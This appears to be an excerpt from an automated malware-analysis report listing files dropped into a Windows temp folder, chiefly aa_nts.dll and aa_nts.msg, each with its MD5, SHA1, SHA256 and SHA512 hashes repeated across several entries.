SHA1 3fb2c608529575ad4b06770e130eb9d2d0750ed7
SHA256 c1d2e8b7b961e48a1ee4877d3f527f038697e0dfcda69b8cd470900b73e1e674
SHA512 567906d7b98058ec24c1455d5167ee13127ce6739350f1f38954c01e46f96ba0851d6c88ef49a192edb53c5f759ab8663c7ac9fcc795c35db98165d11259587c

C:\Users\Admin\AppData\Local\Temp\8759.tmp\aa_nts.dll

MD5 480a66902e6e7cdafaa6711e8697ff8c
SHA1 6ac730962e7c1dba9e2ecc5733a506544f3c8d11
SHA256 7eaaaa6010bbcd6bb8c9ad08d4b0966c7aedc9b2ac24758f170012ac36e508b5
SHA512 7d010cd47b7d1adf66f9c97afc6c3805997aa5c7cc6ff13eddee81f24cf2b95a3fe375ec5b3d6185c0bc8840b4ad91ae143c73a39af26391cc182ab6a1793ba5

\Users\Admin\AppData\Local\Temp\8759.tmp\aa_nts.dll

MD5 480a66902e6e7cdafaa6711e8697ff8c
SHA1 6ac730962e7c1dba9e2ecc5733a506544f3c8d11
SHA256 7eaaaa6010bbcd6bb8c9ad08d4b0966c7aedc9b2ac24758f170012ac36e508b5
SHA512 7d010cd47b7d1adf66f9c97afc6c3805997aa5c7cc6ff13eddee81f24cf2b95a3fe375ec5b3d6185c0bc8840b4ad91ae143c73a39af26391cc182ab6a1793ba5

\Users\Admin\AppData\Local\Temp\8759.tmp\aa_nts.dll

MD5 480a66902e6e7cdafaa6711e8697ff8c
SHA1 6ac730962e7c1dba9e2ecc5733a506544f3c8d11
SHA256 7eaaaa6010bbcd6bb8c9ad08d4b0966c7aedc9b2ac24758f170012ac36e508b5
SHA512 7d010cd47b7d1adf66f9c97afc6c3805997aa5c7cc6ff13eddee81f24cf2b95a3fe375ec5b3d6185c0bc8840b4ad91ae143c73a39af26391cc182ab6a1793ba5

C:\Users\Admin\AppData\Local\Temp\8759.tmp\aa_nts.msg

MD5 3f05819f995b4dafa1b5d55ce8d1f411
SHA1 404449b79a16bfc4f64f2fd55cd73d5d27a85d71
SHA256 7e0bf0cbd06a087500a9c3b50254df3a8a2c2980921ab6a62ab1121941c80fc0
SHA512 34abb7df8b3a68e1649ff0d2762576a4d4e65da548e74b1aa65c2b82c1b89f90d053ecddac67c614ca6084dc5b2cb552949250fb70f49b536f1bcb0057717026

\Users\Admin\AppData\Local\Temp\8759.tmp\aa_nts.dll

MD5 480a66902e6e7cdafaa6711e8697ff8c
SHA1 6ac730962e7c1dba9e2ecc5733a506544f3c8d11
SHA256 7eaaaa6010bbcd6bb8c9ad08d4b0966c7aedc9b2ac24758f170012ac36e508b5
SHA512 7d010cd47b7d1adf66f9c97afc6c3805997aa5c7cc6ff13eddee81f24cf2b95a3fe375ec5b3d6185c0bc8840b4ad91ae143c73a39af26391cc182ab6a1793ba5

\Users\Admin\AppData\Local\Temp\8759.tmp\aa_nts.dll

MD5 480a66902e6e7cdafaa6711e8697ff8c
SHA1 6ac730962e7c1dba9e2ecc5733a506544f3c8d11
SHA256 7eaaaa6010bbcd6bb8c9ad08d4b0966c7aedc9b2ac24758f170012ac36e508b5
SHA512 7d010cd47b7d1adf66f9c97afc6c3805997aa5c7cc6ff13eddee81f24cf2b95a3fe375ec5b3d6185c0bc8840b4ad91ae143c73a39af26391cc182ab6a1793ba5